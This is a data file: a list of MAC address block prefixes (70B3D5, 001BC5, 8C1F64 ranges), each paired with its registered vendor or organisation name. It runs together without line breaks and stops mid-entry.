70B3D504A Gecko Robotics Inc 70B3D5E9C ATG UV Technology 70B3D5FF7 Cybercom AB 70B3D5E2C Fourth Frontier Technologies Private Limited 70B3D54C2 hera Laborsysteme GmbH 70B3D5AA6 Proximus 70B3D5A05 Wartsila Voyage Limited 70B3D5825 TATTILE SRL 70B3D5523 Tibit Communications 70B3D5767 FRANKLIN FRANCE 70B3D5C4B ANKER-EAST 70B3D59C0 Schneider Displaytechnik GmbH 70B3D5B97 Canam Technology, Inc. 70B3D5465 ENERGISME 70B3D5A07 IoTrek Technology Private Limited 70B3D52F8 Tunstall A/S 70B3D5F07 DUVAL MESSIEN 70B3D56B1 TTC TELEKOMUNIKACE, s.r.o. 70B3D5930 The Institute of Mine Seismology 70B3D5816 Smith Meter, Inc. 70B3D59C7 YUYAMA MFG Co.,Ltd 70B3D5D9A Wuhan Xingtuxinke ELectronic Co.,Ltd 70B3D56B0 PTYPE Co., LTD. 70B3D5EBB Beijing Wing ICT Technology Co., Ltd. 70B3D560E HDANYWHERE 70B3D5B53 Revolution Retail Systems, LLC 70B3D55F4 FDSTiming 70B3D5D32 Euklis by GSG International 70B3D563C Pivothead 70B3D5A85 exceet electronics GesmbH 70B3D57E5 Megaflex Oy 70B3D537A APG Cash Drawer, LLC 70B3D5AFF digital-spice 70B3D5136 Miguel Corporate Services Pte Ltd 70B3D5C06 XotonicsMED GmbH 70B3D58CB WELT Corporation 70B3D522F Instec, Inc. 70B3D5594 ATE Systems Inc 70B3D527A TD ECOPHISIKA 70B3D570F Alion Science & Technology 70B3D590A Hangzhou SunTown Intelligent Science & Technology Co.,Ltd. 70B3D5FEC Finder SpA 70B3D5A20 Design For Life Systems 70B3D5131 Inova Design Solutions Ltd 70B3D5498 XGEM SAS 70B3D5989 DCNS 70B3D5CED Advanced Products Corporation Pte Ltd 70B3D542C D.Marchiori Srl 70B3D5227 Montalvo 70B3D5779 DR.BRIDGE AQUATECH 70B3D5855 CRDE 70B3D5F8D Flextronics Canafa Design Services 70B3D5938 JETI Technische Instrumente GmbH 70B3D54A7 aelettronica group srl 70B3D59B1 Aplex Technology Inc. 70B3D5CA4 Netemera Sp. z o.o. 70B3D5E82 RF Track 70B3D5CAA Bel Power Solutions GmbH 70B3D5499 Pycom Ltd 70B3D568F PEEK TRAFFIC 70B3D54C7 SOLVERIS sp. z o.o. 70B3D5A53 GS Industrie-Elektronik GmbH 70B3D57C2 Morgan Schaffer Inc. 70B3D5692 HOSIN INDUSTRIAL LIMITED 70B3D5584 Sertone, a division of Opti-Knights Ltd 70B3D57D5 SICS Swedish ICT 70B3D59D2 ACS MOTION CONTROL 70B3D555A Sontay Ltd. 70B3D56C5 CJSC «Russian telecom equipment company» (CJSC RTEC) 70B3D5696 Open Grow 70B3D502D NEXTtec srl 70B3D578C Survalent Technology Corporation 70B3D5B7D LOGIX ITS Inc 70B3D5167 Eiden Co.,Ltd. 70B3D58DB Kratos Analytical Ltd 70B3D5ABE MART NETWORK SOLUTIONS LTD 70B3D588B WUHAN EASYLINKIN TECHNOLOGY co.,LTD 70B3D55E6 Mechatronics Systems Private Limited 70B3D5186 Rohde&Schwarz Topex SA 70B3D549F B.P.A. SRL 70B3D5AAC SensoTec GmbH 70B3D5986 Aplex Technology Inc. 70B3D5A2C TLV CO., LTD. 70B3D5881 TATTILE SRL 70B3D504C mapna group 70B3D5B55 CTAG - ESG36871424 70B3D56EC CRDE 70B3D5A10 w-tec AG 70B3D5A7C Transelektronik Messgeräte GmbH 70B3D591B Dolotron d.o.o. 70B3D551B Vitrea Smart Home Technologies 70B3D539C GD Mission Systems 70B3D5712 APG Cash Drawer, LLC 70B3D5CCE Proconex 2010 Inc. 70B3D5643 Marques,S.A. 70B3D5DE4 MAVILI ELEKTRONIK TIC. VE SAN. A.S. 70B3D58F2 Rimota Limited 70B3D5879 ZIGPOS GmbH 70B3D535A Applied Radar, Inc. 70B3D5AC3 Novoptel GmbH 70B3D50FA InsideRF Co., Ltd. 70B3D5DE2 ACD Elekronik GmbH 70B3D5B81 Instro Precision Limited 70B3D59E0 ES Industrial Systems Co., Ltd. 70B3D56BF Otto Bihler Maschinenfabrik GmbH & Co. KG 70B3D5A66 Trapeze Software Group Inc 70B3D5D34 G-PHILOS CO.,LTD 70B3D5D65 CRDE 70B3D51AB Access Control Systems JSC 70B3D5531 ATEME 70B3D5CF2 tinnos 70B3D5028 AT-Automation Technology GmbH 70B3D57A0 Reactec Ltd 70B3D5A3B Grace Design/Lunatec LLC 70B3D5D94 Dewetron GmbH 70B3D5658 emperor brands 70B3D57E9 Mecsel Oy 70B3D5B89 IDA 70B3D505A Uni Control System Sp. z o. o. 70B3D5FD8 MB connect line GmbH Fernwartungssysteme 70B3D506C AppTek 70B3D5A9D VITEC MULTIMEDIA 70B3D574E PushCorp, Inc. 70B3D5B67 RedWave Labs Ltd 70B3D5C32 INFRASAFE/ ADVANTOR SYSTEMS 70B3D537B Power Ltd. 70B3D53F4 Wincode Technology Co., Ltd. 70B3D517E OCULI VISION 70B3D5E39 Thinnect, Inc, 70B3D5CAC CRDE 70B3D56DF Mango DSP, Inc. 70B3D5733 SA Instrumentation Limited 70B3D58BE Connoiseur Electronics Private Limited 70B3D5618 Motec Pty Ltd 70B3D57CF ORCA Technologies, LLC 70B3D5FB5 Orange Tree Technologies Ltd 70B3D5F65 MARKUS LABS 70B3D5286 Pedax Danmark 70B3D5B02 Nordic Automation Systems AS 70B3D509E MobiPromo 70B3D5261 Potter Electric Signal Co. LLC 70B3D5187 Elektronik & Präzisionsbau Saalfeld GmbH 70B3D5942 TruTeq Devices (Pty) Ltd 70B3D50EE Picture Elements, Inc. 70B3D5E49 Kendrion Mechatronics Center GmbH 70B3D51E3 Hatel Elektronik LTD. STI. 70B3D5A92 Grossenbacher Systeme AG 70B3D5578 IMAGE TECH CO.,LTD 70B3D5D9E Grupo Epelsa S.L. 70B3D5C7F TATTILE SRL 70B3D5659 E2G srl 70B3D5476 FR-Team International SA 70B3D588A Perceptics, LLC 70B3D5D60 Flintab AB 70B3D58F6 Dofuntech Co.,LTD. 70B3D51C4 Smeg S.p.A. 70B3D5729 EMAC, Inc. 70B3D5605 Aplex Technology Inc. 70B3D5A06 Kopis Mobile LLC 70B3D5943 Abbott Medical Optics Inc. 70B3D5BF2 TWIN DEVELOPMENT 70B3D5D38 Vista Research, Inc. 70B3D52B3 HAS co.,ltd. 70B3D545C AlyTech 70B3D57E3 RedLeaf Security 70B3D52F9 CONSOSPY 70B3D511D Dakton Microlabs LLC 70B3D50BE ChamSys Ltd 70B3D539D Comark Interactive Solutions 70B3D5A3C Wave Music Ltd 70B3D5C77 Yönnet Akıllı Bina ve Otomasyon Sistemleri 70B3D5B28 HUSTY M.Styczen J.Hupert sp.j. 70B3D56FB Shachihata Inc. 70B3D5A12 QUERCUS TECHNOLOGIES, S.L. 70B3D5AF5 Net And Print Inc. 70B3D5C01 SmartGuard LLC 70B3D520A Golden Grid Systems 70B3D57C8 CRDE 70B3D5A95 DEUTA-WERKE GmbH 70B3D55B1 EPD Electronics 70B3D5D73 ERMINE Corporation 70B3D564A Netbric Technology Co.,Ltd. 70B3D54EB INFOSOFT DIGITAL DESIGN & SERVICES PRIVATE LIMITED 70B3D5524 Wuxi New Optical Communication Co.,Ltd. 70B3D557D WICOM1 GmbH 70B3D56BE VANTAGE INTEGRATED SECURITY SOLUTIONS PVT LTD 70B3D576A Swiftnet SOC Ltd 70B3D5D7E Triax A/S 70B3D55FC SURTEC 70B3D5D3F GLOBALCOM ENGINEERING SPA 70B3D50C5 Precitec Optronik GmbH 70B3D5F00 Aplex Technology Inc. 70B3D5172 LumiGrow, Inc 70B3D5E7A ART SPA 70B3D5B91 Dynetics, Inc. 70B3D5D57 TRIUMPH BOARD a.s. 70B3D5EA4 Grupo Epelsa S.L. 70B3D5343 Elektro-System s.c. 70B3D52EE Aplex Technology Inc. 70B3D5505 MC2-Technologies 70B3D535E EIDOS s.p.a. 70B3D53FF Hydra Controls 70B3D5F2D ID Lock AS 70B3D54AD GACI 70B3D56B3 DuraComm Corporation 70B3D59E7 Xiamen Maxincom Technologies Co., Ltd. 70B3D5472 Quadio Devices Private Limited 70B3D5538 sydetion UG (h.b.) 70B3D52DC Bolide Technology Group, Inc. 70B3D5C85 Solid State Disks Ltd 70B3D5347 OAS Sweden AB 70B3D5530 iSiS-Ex Limited 70B3D5935 Sensor Developments 70B3D5C2A Array Telepresence 70B3D5342 Solectrix 70B3D5E20 Signature Control Systems, LLC. 70B3D53F9 Herrick Tech Labs 70B3D5FA2 Sarokal Test Systems Oy 70B3D5B8B Profound Medical Inc. 70B3D5A1C MECA SYSTEM 70B3D5F36 dinosys 70B3D5A26 Hear Gear, Inc. 70B3D57A7 Symbicon Ltd 70B3D5D9B Russian Telecom Equipment Company 70B3D579B Soniclean Pty Ltd 70B3D5A50 LECIP CORPORATION 70B3D578B Jingtu Printing Systems Co., Ltd 70B3D552B GE Aviation Cheltenham 70B3D55FF Vaisala Oyj 70B3D5D80 AMMT GmbH 70B3D515F SAVRONİK ELEKTRONİK 70B3D5F7E Alpha Elettronica s.r.l. 70B3D5A6E JSC Electrical Equipment Factory 70B3D546B Airborne Engineering Limited 70B3D565D GEGA ELECTRONIQUE 70B3D5D79 GOMA ELETTRONICA SpA 70B3D53E3 Head 70B3D583F Lumine Lighting Solutions Oy 70B3D5E70 DISK Multimedia s.r.o. 70B3D5EB1 CP contech electronic GmbH 70B3D5C5A Commsignia Ltd. 70B3D59DB CAS Medical Systems, Inc 70B3D5ED5 hangzhou battle link technology Co.,Ltd 70B3D5FC6 Tecnint HTE SRL 70B3D50A5 FUELCELLPOWER 70B3D50EC ACS MOTION CONTROL 70B3D50A4 Communication Technology Ltd. 70B3D55C5 Haag-Streit AG 70B3D5AFA Power Security Systems Ltd. 70B3D584A MOG Laboratories Pty Ltd 70B3D55E4 DSP DESIGN 70B3D5DF0 astozi consulting Tomasz Zieba 70B3D5104 Plum sp. z o.o 70B3D5C25 speedsignal GmbH 70B3D50AB KST technology 70B3D56F3 iungo 70B3D5CDE Multipure International 70B3D58F5 Stmovic 70B3D5ABF AGR International 70B3D5ABC BKM-Micronic Richtfunkanlagen GmbH 70B3D503B SSL - Electrical Aerospace Ground Equipment Section 70B3D5B3C DORLET SAU 70B3D5731 Phoniro Systems AB 70B3D5501 Peek Traffic 70B3D582C NELS Ltd. 70B3D5A62 Environexus 70B3D5A57 PCSC 70B3D519C Kubu, Inc. 70B3D533C Videri Inc. 70B3D5F68 AL ZAJEL MODERN TELECOMM 70B3D56D9 VECTARE Inc 70B3D5655 AOT System GmbH 70B3D554E RFL Electronics, Inc. 70B3D5204 TWC 70B3D5099 Schwer+Kopka GmbH 70B3D5C6A Private 70B3D5029 Marimo electronics Co.,Ltd. 70B3D5634 idaqs Co.,Ltd. 70B3D5E07 Baader Planetarium GmbH 70B3D5C81 DSP DESIGN 70B3D5E53 MI INC. 70B3D57A9 adidas AG 70B3D5EE4 O-Net Automation Technology (Shenzhen)Limited 70B3D561F Labotect Labor-Technik-Göttingen GmbH 70B3D5077 InAccess Networks SA 70B3D54C1 QUERCUS TECHNOLOGIES, S. L. 70B3D5B2A Myro Control, LLC 70B3D56F6 Acco Brands Europe 70B3D5F38 Scanvaegt Nordic A/S 70B3D5C2C Dromont S.p.A. 70B3D5B8A Nexus Tech. VN 70B3D5D4E FLSmidth 70B3D529D XTech2 SIA 70B3D50A9 ProConnections, Inc. 70B3D50E0 PLCiS 70B3D53ED Ultra Electronics Sonar System Division 70B3D5D8B Lenoxi Automation s.r.o. 70B3D5ECD SBS-Feintechnik GmbH & Co. KG 70B3D535C ACS electronics srl 70B3D5190 Fantom Wireless, Inc. 70B3D5814 Ingenieurbuero SOMTRONIK 70B3D542F SINTOKOGIO, LTD 70B3D5702 Sensor Highway Ltd 70B3D5044 Don Electronics Ltd 001BC50C8 Dialine 001BC50C4 ELDES 001BC50C7 WIZZILAB SAS 001BC50B9 Denki Kogyo Company, Limited 001BC50B1 Roslen Eco-Networking Products 001BC50B5 Exibea AB 001BC50B3 FSM Solutions Limited 001BC50A0 Silvair 001BC509D Navitar Inc 001BC5096 Sanstreak Corp. 001BC508F Unilever R&D 001BC5093 Ambient Devices, Inc. 001BC5092 Arnouse Digital Devices, Corp. 001BC508B Nistica 001BC5080 LUMINO GmbH 001BC5085 Oberon microsystems, Inc. 001BC507D Greatcom AG 001BC507C head 001BC5069 Datasat Digital Entertainment 001BC5067 Embit srl 001BC5064 Enkora Oy Ltd 001BC5061 Scientific-Technical Center "Epsilon" Limited company 001BC5058 optiMEAS GmbH 001BC5057 EREE Electronique 001BC5055 LUMIPLAN TRANSPORT 001BC5045 Marvel Digital International Limited 001BC5049 EUROCONTROL S.p.A. 001BC5033 JE Suunnittelu Oy 001BC5031 ADIXEIN LIMITED 001BC5034 InterCEL Pty Ltd 001BC502C Care Everywhere LLC 001BC502B Saturn South Pty Ltd 001BC5028 STECHWIN.CO.LTD. 001BC5021 Openpeak, Inc 001BC5022 CJSC STC SIMOS 001BC5020 Momentum Data Systems 001BC501F Saturn Solutions Ltd 001BC5016 Energotechnica OOO NPP Ltd 001BC5010 Softel SA de CV 001BC500A Mercury HMI Ltd 001BC500C Quantum Technology Sciences, Inc. 001BC5009 Solomon Systech Pte Ltd 8C1F64A34 Potter Electric Signal Co. LLC 8C1F643A2 Kron Medidores 70B3D5CB1 RADAR 8C1F64E74 Magosys Systems LTD 8C1F64DFC Meiko Electronics Co.,Ltd. 8C1F64620 Solace Systems Inc. 8C1F64D9B GiS mbH 8C1F640B6 Luke Granger-Brown 8C1F64A36 DONGGUAN GAGO ELECTRONICS CO.,LTD 8C1F6474E OpenPark Technologies Kft 8C1F64362 Power Electronics Espana, S.L. 8C1F64383 Tristate Electronic Mfg 8C1F64AD8 Novanta IMS 8C1F6448F Mecos AG 8C1F64899 American Edge IP 8C1F64D93 Algodue Elettronica Srl 8C1F64C1C Vektrex Electronics Systems, Inc. 8C1F64E23 Chemito Infotech PVT LTD 8C1F64ECC Baldwin Jimek AB 8C1F6414D Vertesz Elektronika Kft. 8C1F6431B joint analytical systems GmbH 8C1F64DD4 Midlands Technical Co., Ltd. 8C1F640D8 Power Electronics Espana, S.L. 8C1F640BF Aurora Communication Technologies Corp. 8C1F649E0 Druck Ltd. 8C1F64A91 Infinitive Group Limited 8C1F64D6C Packetalk LLC 8C1F642C7 CONTRALTO AUDIO SRL 8C1F64E8F JieChuang HeYi(Beijing) Technology Co., Ltd. 8C1F641CE Eiden Co.,Ltd. 8C1F642B8 Veinland GmbH 8C1F641AD Nexxto Servicos Em Tecnologia da Informacao SA 8C1F642F0 Switch Science, Inc. 8C1F64A81 3D perception AS 8C1F64D21 AMETEK CTS GMBH 8C1F6432B Shenyang Taihua Technology Co., Ltd. 8C1F64907 Sicon srl 8C1F64423 Hiwin Mikrosystem Corp. 8C1F64D42 YUYAMA MFG Co.,Ltd 8C1F64FD5 THE WHY HOW DO COMPANY, Inc. 8C1F64D51 ZIGEN Lighting Solution co., ltd. 8C1F648DF Grossenbacher Systeme AG 8C1F6471B Adasky Ltd. 8C1F64636 Europe Trade 8C1F641F5 NanoThings Inc. 70B3D594B RF Code 8C1F64978 Planet Innovation Products Inc. 8C1F64211 Bipom Electronics, Inc. 8C1F64F5F TR7 Siber Savunma A.S. 8C1F64300 Abbott Diagnostics Technologies AS 70B3D54BC TIAMA 70B3D58BA TIAMA 8C1F6463B TIAMA 8C1F640B7 TIAMA 8C1F64475 Alpine Quantum Technologies GmbH 8C1F6406B Sanwa Supply Inc. 8C1F647DC LINEAGE POWER PVT LTD., 8C1F64CC5 Potter Electric Signal Co. LLC 8C1F64ECF Monnit Corporation 8C1F64D98 Gnewtek photoelectric technology Ltd. 8C1F64A5E XTIA Ltd. 8C1F64FDC Nuphoton Technologies 8C1F6420E Alpha Bridge Technologies Private Limited 8C1F649FB CI SYSTEMS ISRAEL LTD 8C1F64691 Wende Tan 8C1F6462D Embeddded Plus Plus 8C1F64B65 HomyHub SL 8C1F64C59 Tunstall A/S 8C1F64EE6 LYNKX 8C1F64406 ANDA TELECOM PVT LTD 8C1F643B7 AI-BLOX 8C1F649C0 Header Rhyme 8C1F645FA PolCam Systems Sp. z o.o. 8C1F642BB Chakra Technology Ltd 8C1F642FC Unimar, Inc. 8C1F64A9E Optimum Instruments Inc. 8C1F64C61 Beijing Ceresdate Technology Co.,LTD 8C1F64610 Beijing Zhongzhi Huida Technology Co., Ltd 8C1F6486A VisionTools Bildanalyse Systeme GmbH 8C1F64931 Noptel Oy 8C1F64FCC GREDMANN TAIWAN LTD. 70B3D5A31 Wise Ally Holdings Limited 8C1F64024 Shin Nihon Denshi Co., Ltd. 8C1F64011 DEUTA-WERKE GmbH 8C1F64145 Spectrum FiftyNine BV 8C1F64867 Forever Engineering Systems Pvt. Ltd. 8C1F64502 Samwell International Inc 8C1F64573 Ingenious Technology LLC 8C1F642E2 Mark Roberts Motion Control 8C1F6491D enlighten 8C1F64F22 Voyage Audio LLC 8C1F644FB MESA TECHNOLOGIES LLC 8C1F64BF3 Alphatek AS 8C1F647A4 Hirotech inc. 8C1F64731 ehoosys Co.,LTD. 70B3D530E Ecolonum Inc. 8C1F64F2D HUERNER Schweisstechnik GmbH 8C1F6402F SOLIDpower SpA 8C1F64C91 Soehnle Industrial Solutions GmbH 8C1F64BCB A&T Corporation 8C1F64699 FIDICA GmbH & Co. KG 8C1F64F70 Vision Systems Safety Tech 8C1F64314 Cedel BV 8C1F64CB2 Dyncir Soluções Tecnológicas Ltda 8C1F643B6 TEX COMPUTER SRL 8C1F64CEB EUREKA FOR SMART PROPERTIES CO. W.L.L 8C1F64EF8 Northwest Central Indiana Community Partnerships Inc dba Wabash Heartland Innovation Network (WHIN) 8C1F6466F Elix Systems SA 8C1F64309 MECT SRL 70B3D51D7 BAE Systems Apllied Intelligence 8C1F646A0 Avionica 8C1F6434D biosilver .co.,ltd 8C1F64698 Arcus-EDS GmbH 8C1F6428D AVA Monitoring AB 8C1F646EC Bit Trade One, Ltd. 8C1F648F4 Loadrite (Auckland) Limited 8C1F6498F Breas Medical AB 8C1F64662 Suzhou Leamore Optronics Co., Ltd. 8C1F64E2D Private 8C1F647BC GO development GmbH 8C1F646BB Season Electronics Ltd 8C1F64D5E Integer.pl S.A. 8C1F6458C Ear Micro LLC 8C1F640EF DAVE SRL 8C1F64B13 Abode Systems Inc 8C1F64544 Tinkerbee Innovations Private Limited 8C1F641F0 AVCOMM Technologies Inc 8C1F64CC6 Genius Vision Digital Private Limited 8C1F643E3 FMTec GmbH - Future Management Technologies 8C1F64080 Twinleaf LLC 8C1F64B7C EVERNET CO,.LTD TAIWAN 8C1F64017 Farmote Limited 8C1F643C5 Stratis IOT 8C1F643D4 e.p.g. Elettronica s.r.l. 8C1F64EEA AMESS 8C1F64AB4 Beijing Zhongchen Microelectronics Co.,Ltd 8C1F6454F Toolplanet Co., Ltd. 8C1F64E7C Ashinne Technology Co., Ltd 8C1F64702 AIDirections 8C1F647B7 Weidmann Tecnologia Electrica de Mexico 8C1F64AC5 Forever Engineering Systems Pvt. Ltd. 8C1F64D02 Flextronics International Kft 70B3D5781 Project Service S.a.s. 8C1F64FED GSP Sprachtechnologie GmbH 8C1F6452D Cubic ITS, Inc. dba GRIDSMART Technologies 8C1F643F4 ACTELSER S.L. 8C1F6438E Wartsila Voyage Limited 8C1F64FA2 AZD Praha s.r.o., ZOZ Olomouc 8C1F64943 Autark GmbH 8C1F64E30 VMukti Solutions Private Limited 8C1F647A7 Timegate Instruments Ltd. 8C1F6435C Opgal Optronic Industries ltd 8C1F64115 Neuralog LP 8C1F64C24 Alifax S.r.l. 8C1F6440C Sichuan Aiyijan Technology Company Ltd. 8C1F64194 TIFLEX 8C1F6405F ESCAD AUTOMATION GmbH 8C1F648D9 Pietro Fiorentini Spa 8C1F64A4C Flextronics International Kft 8C1F64A44 Rapidev Pvt Ltd 8C1F644AC Vekto 8C1F64E02 ITS Teknik A/S 8C1F6450A BELLCO TRADING COMPANY (PVT) LTD 8C1F64BD3 IO Master Technology 8C1F64ED9 NETGEN HITECH SOLUTIONS LLP 8C1F64581 SpectraDynamics, Inc. 8C1F649D4 Wolfspyre Labs 8C1F646CF Italora 8C1F645AE Suzhou Motorcomm Electronic Technology Co., Ltd 8C1F64D40 Breas Medical AB 8C1F64417 Fracarro srl 8C1F64D0E Labforge Inc. 8C1F64707 OAS AG 8C1F64F72 Contrader 8C1F64B8D Tongye lnnovation Science and Technology (Shenzhen) Co.,Ltd 8C1F6477E Institute of geophysics, China earthquake administration 70B3D5A1D Fluid Components Intl 70B3D5EB0 Nautel LTD 8C1F64848 Jena-Optronik GmbH 8C1F6438D Wilson Electronics 8C1F648D4 Recab Sweden AB 8C1F64256 Landinger 70B3D585C Tabology 8C1F6457B Potter Electric Signal Company 8C1F64DCA Porsche engineering 8C1F64328 Com Video Security Systems Co., Ltd. 8C1F647B8 TimeMachines Inc. 8C1F64A07 GJD Manufacturing 8C1F64780 HME Co.,ltd 8C1F64CD8 Gogo Business Aviation 8C1F64BEE Sirius LLC 8C1F64971 INFRASAFE/ ADVANTOR SYSTEMS 8C1F64512 Blik Sensing B.V. 8C1F64CA1 Pantherun Technologies Pvt Ltd 8C1F64973 Dorsett Technologies Inc 8C1F641E1 VAF Co. 8C1F64CDF Canway Technology GmbH 8C1F649F2 MB connect line GmbH Fernwartungssysteme 8C1F649F0 ePlant, Inc. 8C1F641D1 AS Strömungstechnik GmbH 8C1F646EA KMtronic ltd 8C1F640F9 ikan International LLC 8C1F64D78 Hunan Oushi Electronic Technology Co.,Ltd 8C1F64923 MB connect line GmbH Fernwartungssysteme 8C1F64E73 GTR Industries 8C1F648E2 ALPHA Corporation 8C1F648D1 Orlaco Products B.V. 8C1F64FBD SAN-AI Electronic Industries Co.,Ltd. 8C1F64CA6 ReliaSpeak Information Technology Co., Ltd. 8C1F6430A XCOM Labs 8C1F64E98 Luxshare Electronic Technology (Kunshan) LTD 8C1F64534 SURYA ELECTRONICS 8C1F64AD2 YUYAMA MFG Co.,Ltd 8C1F6407E FLOYD inc. 8C1F645D3 Eloy Water 8C1F64242 GIORDANO CONTROLS SPA 8C1F64B0C Barkodes Bilgisayar Sistemleri Bilgi Iletisim ve Y 8C1F64C50 Spacee 8C1F643B5 SVMS 8C1F6453D NEXCONTECH 8C1F64AB5 JUSTMORPH PTE. LTD. 8C1F64D54 Grupo Epelsa S.L. 8C1F64E43 Daedalean AG 8C1F649C1 RealWear 8C1F647C8 Jacquet Dechaume 8C1F64304 Jemac Sweden AB 8C1F64AED MB connect line GmbH Fernwartungssysteme 8C1F64F86 INFOSTECH Co., Ltd. 8C1F64445 Figment Design Laboratories 8C1F64AA4 HEINEN ELEKTRONIK GmbH 8C1F644FA Sanskruti 8C1F64801 Zhejiang Laolan Information Technology Co., Ltd 8C1F64204 castcore 8C1F64947 LLC "TC "Vympel" 8C1F6429F NAGTECH LLC 8C1F64C03 Abiman Engineering 8C1F64438 Integer.pl S.A. 8C1F64CF1 ROBOfiber, Inc. 8C1F6419C Aton srl 8C1F64AAB BlueSword Intelligent Technology Co., Ltd. 8C1F64991 DB Systel GmbH 8C1F64C41 Katronic AG & Co. KG 8C1F643A4 QLM Technology Ltd 70B3D5AC2 Wisebox.,Co.Ltd 70B3D5E03 MBJ 70B3D581F CAR-connect GmbH 70B3D5A8F VK Integrated Systems 70B3D5271 Code Blue Corporation 70B3D5BF7 Fischer Connectors 70B3D5975 Coester Automação Ltda 70B3D5CE6 Dynim Oy 70B3D5198 Beijing Muniulinghang Technology Co., Ltd 70B3D538E China Telecom Fufu Information Technology CO.,LTD 70B3D50AA Wanco Inc 70B3D5F74 TESSA AGRITECH SRL 70B3D5E19 BAB TECHNOLOGIE GmbH 70B3D550B Nordson Corporation 70B3D5720 Jeio Tech 70B3D5928 Done Design Inc 70B3D5812 TESCAN Brno, s.r.o. 70B3D5965 LINEAGE POWER PVT LTD., 70B3D52E4 Schneider Electric Motion USA 70B3D5B79 Dadacon GmbH 70B3D5DEB DORLET SAU 70B3D5F1B IndiNatus (IndiNatus India Private Limited) 70B3D56B4 Nudron IoT Solutions LLP 70B3D53DC XIA LLC 70B3D5419 Prodata Mobility Brasil SA 70B3D5004 LEIDOS 70B3D5FE1 Shenzhen Zhiting Technology Co.,Ltd 70B3D5915 DHK Storage, LLC 70B3D5CC0 Avionica 70B3D5725 Swiss Timing LTD 70B3D5FE0 Blueprint Lab 70B3D55B7 on-systems limited 70B3D57CC MITSUBISHI HEAVY INDUSTRIES THERMAL SYSTEMS, LTD. 70B3D54FB MAS Elettronica sas di Mascetti Sandro e C. 70B3D5F31 The-Box Development 70B3D5946 GREATWALL Infotech Co., Ltd. 70B3D5998 Kita Kirmizi Takim Bilgi Guvenligi Danismanlik ve Egitim A.S. 70B3D5AD7 Octopus IoT srl 70B3D5B4C AmericanPharma Technologies 70B3D572B Medipense Inc. 70B3D5311 Günther Spelsberg GmbH + Co. KG 70B3D5E66 Eneon sp. z o.o. 70B3D58D2 WIZAPPLY CO.,LTD 70B3D5B0D ALFI 70B3D582F SIANA Systems 70B3D5737 SD Biosensor 70B3D559E i2-electronics 70B3D5065 EXATEL 70B3D5EC2 Lightside Instruments AS 70B3D5B42 Samwell International Inc 70B3D5C13 Guangzhou Xianhe Technology Engineering Co., Ltd 70B3D5AFC BAE Systems 70B3D5A65 CREATIVE 70B3D5290 GETT Geraetetechnik GmbH 70B3D5CEE ACRIOS Systems s.r.o. 70B3D5FAC Integrated Protein Technologies, Inc. 70B3D5C47 ABB 70B3D55D7 Clockwork Dog 70B3D56E2 E-Controls 70B3D58B5 xTom GmbH 70B3D535B Nuance Hearing Ltd. 70B3D5E65 BIRTECH TECHNOLOGY 70B3D5D82 SUN ELECTRONICS CO.,LTD. 70B3D5E68 Transit Solutions, LLC. 70B3D5E44 BrainboxAI Inc 70B3D58D4 Guangdong Transtek Medical Electronics Co., Ltd. 70B3D509C Cardinal Kinetic 70B3D558B Williams Sound LLC 70B3D56C8 Sicon srl 70B3D5859 HAN CHANG 70B3D5B69 Daatrics LTD 70B3D51A2 Xirgo Technologies LLC 70B3D56A7 Partilink Inc. 70B3D51BA Guan Show Technologe Co., Ltd. 70B3D5B1C Serveron / Qualitrol 70B3D5DDE Abbott Diagnostics Technologies AS 70B3D5B22 YUYAMA MFG Co.,Ltd 70B3D583D Gentec 70B3D5E6B Shenzhen Shi Fang Communication Technology Co., Ltd 70B3D5769 Barber Creations LLC 70B3D53EE Laser Imagineering Vertriebs GmbH 70B3D5F02 ABECO Industrie Computer GmbH 70B3D5D53 BeiLi eTek (Zhangjiagang) Co., Ltd. 70B3D5D18 MetCom Solutions GmbH 70B3D571C Konzept Informationssysteme GmbH 70B3D53CD BRS Sistemas Eletrônicos 70B3D5AE4 Nuance Hearing Ltd. 70B3D5DB3 Klaxoon 70B3D5FE5 Malin Space Science System 70B3D57D3 OLEDCOMM 70B3D5E64 HONG JIANG ELECTRONICS CO., LTD. 70B3D55CB ECoCoMS Ltd. 70B3D5905 Wexiodisk AB 70B3D52CB Yongtong tech 70B3D55FD Windar Photonics 70B3D5D35 King-On Technology Ltd. 70B3D5EAF Sicon srl 70B3D5C02 Garmo Instruments S.L. 70B3D5F4A LACS SRL 70B3D536B Huz Electronics Ltd 70B3D543C Scenario Automation 70B3D5110 Orion Power Systems, Inc. 70B3D5468 Shanghai Junqian Sensing Technology Co., LTD 70B3D51C1 Sphere of economical technologies Ltd 70B3D566C KRISTECH Krzysztof Kajstura 70B3D5E51 NooliTIC 70B3D566F Simplified MFG 70B3D51B2 Cavagna Group Spa 70B3D53AC RF-Tuote Oy 70B3D5C5E Frog Cellsat Limited 70B3D5D88 Nidec asi spa 70B3D5F66 Seznam.cz, a.s., CZ26168685 70B3D589F Levelup Holding, Inc. 70B3D532B RTA srl 70B3D56DC DEUTA-WERKE GmbH 70B3D55D9 Evident Scientific, Inc. 70B3D5E7F Sankyo Intec Co,ltd 70B3D5EB6 EnergizeEV 70B3D54B5 Toolplanet Co., Ltd. 70B3D5801 Glory Technology Service Inc. 70B3D57FC Surion (Pty) Ltd 70B3D5CBB Postmark Incorporated 70B3D53B1 Global Power Products 70B3D553F Abbott Diagnostics Technologies AS 70B3D595D GIORDANO CONTROLS SPA 70B3D58E7 REO AG 70B3D53FC TangRen C&S CO., Ltd 70B3D5047 OOO "ORION-R" 70B3D5639 DORLET SAU 70B3D53D6 Ariston Thermo s.p.a. 70B3D5F28 Yi An Electronics Co., Ltd 70B3D5130 MG s.r.l. 70B3D5EA5 LOTES TM OOO 70B3D544D Vessel Technology Ltd 70B3D56C2 TEX COMPUTER SRL 70B3D5FA8 Munters 70B3D51EC Cherry Labs, Inc. 70B3D5FFB QUERCUS TECHNOLOGIES, S.L. 70B3D50F4 Visual Robotics 70B3D5038 DONG IL VISION Co., Ltd. 70B3D5B36 Cetitec GmbH 70B3D5385 Kamacho Scale Co., Ltd. 70B3D5109 DiTEST Fahrzeugdiagnose GmbH 70B3D51BF DEUTA-WERKE GmbH 70B3D518F Newtec A/S 70B3D5A7F AUDIO VISUAL DIGITAL SYSTEMS 70B3D5F80 Guan Show Technologe Co., Ltd. 70B3D5A60 Pneumax S.p.A. 70B3D567F IAAN Co., Ltd 001BC5029 2 FRANCE MARINE 70B3D54FD ENLESS WIRELESS 70B3D586A Stealth Communications 70B3D52B5 Dosepack India LLP 70B3D55BB Olympus NDT Canada 70B3D562C OOO "NTC Rotek" 70B3D5DA9 RCH Vietnam Limited Liability Company 70B3D57C6 Utrend Technology (Shanghai) Co., Ltd 70B3D5B5D SHANDHAI 